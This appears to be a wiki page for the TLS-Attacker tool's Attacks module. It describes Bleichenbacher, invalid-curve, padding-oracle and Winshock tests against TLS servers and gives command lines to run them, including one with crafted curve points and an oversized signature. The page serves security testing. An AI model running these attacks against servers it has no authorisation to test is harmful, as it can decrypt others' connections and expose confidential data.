-
Notifications
You must be signed in to change notification settings - Fork 145
Attacks
The Attacks module allows one to test for specific attacks against TLS implementations, or even to execute the whole attacks and extract confidential data.
In the following, we will assume the commands are executed from the Runnable folder. The connection is per default established with localhost:4433, unless defined otherwise (using the -connect parameter).
Bleichenbacher attack allows one to decrypt the premaster secret (and thus the TLS connection). It is applicable if the implementation responds with different error messages, depending on the decrypted PKCS#1 message.
TLS-Attacker allows one to automatically send differently formatted PKCS#1 encrypted messages and observe the server behaviour:
$ java -jar target/TLS-Attacker-1.0.jar bleichenbacherIn case the server responds with different error messages, it is most likely vulnerable.
Further information can be found here: http://web-in-security.blogspot.de/2014/08/old-attacks-on-new-tls-implementations.html
$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar elliptic_test -named_curve SECP192R1 -public_point_base_x 0x9d42769dfdbe113a851bb6b01b1a515d893b5adbc1f61329 -public_point_base_y 0x74749ac0967a8ff4cc54d93187602dd67eb3d22970aca2ca -premaster_secret 0x9d42769dfdbe113a851bb6b01b1a515d893b5adbc1f61329 -cipher TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar padding_oracle$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar winshock -cipher TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA -keystore ../../resources/ec256.jks -password password -alias mykey -signature 0x820428032402403284024032 -signature_length 5000